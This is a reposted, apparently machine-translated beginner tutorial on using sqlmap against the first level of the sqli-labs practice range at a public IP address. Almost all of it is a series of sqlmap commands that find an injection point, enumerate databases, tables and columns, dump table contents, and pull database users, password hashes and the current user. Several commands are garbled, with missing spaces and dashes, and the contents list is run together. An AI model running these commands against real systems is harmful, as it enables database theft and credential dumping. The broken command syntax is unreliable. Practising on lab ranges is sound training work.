Introduction to SQL Injection with SQL Map
catalogue1 Determine if there is an injection point2 Query all databases under the current user3 Obtain the table names in the database4 Get the field names in the table5 Get Field Content6 Obtain all users of the database7 Obtain the password of the database user8 Obtain the name of the current website database9 Obtain the user name of the current website databaseOriginally, SQL injection was so simpleTaking the first level of SQL injection into the shooting range sqli labs as an example, share the use of sqlmap tools.1 Determine if there is an injection pointUsing commands:Using commands:sqlmap-u" http://49
Originally, SQL injection was so simple
Taking the first level of SQL injection into the shooting range sqli labs as an example, share the use of sqlmap tools.
1 Determine if there is an injection point
Using commands:
Using commands:sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"
If there is a white background in the figure, it is determined that there is an injection point
2 Query all databases under the current user
Using commands:
sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"--dbs
You can see that there are five tables
3 Obtain the table names in the database
Select a challenges database and obtain the table name of this database
Using commands:
sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"-Dchallenges--tables
4 Get the field names in the table
Select table T5M0QG6FM2 and obtain the field names
Using commands:
sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"-Dchallenges-TT5M0QG6FM2columns
5 Get Field Content
Using commands:
sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"-Dchallenges-TT5M0QG6FM2--columnsdump
6 Obtain all users of the database
Using commands:
sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"users
Use this command to list all management users
7 Obtain the password of the database user
Using commands:
sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"passwords
8 Obtain the name of the current website database
Using commands:
sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"--current-db
You can see that the current database is security
9 Obtain the user name of the current website database
Using commands:
sqlmap-u" http://49.232.78.252:83/Less -1/? id=1"--current-user
The current user is root
That's all for this article about SQL injection's SQL map beginner learning. For more related SQL map beginner content, please search for previous articles at Script Home or continue browsing the following related articles. We hope everyone can support Script Home more in the future!
Tag: SQL Introduction to Injection with Map
Disclaimer: The content of this article is sourced from the internet. The copyright of the text, images, and other materials belongs to the original author. The platform reprints the materials for the purpose of conveying more information. The content of the article is for reference and learning only, and should not be used for commercial purposes. If it infringes on your legitimate rights and interests, please contact us promptly and we will handle it as soon as possible! We respect copyright and are committed to protecting it. Thank you for sharing.
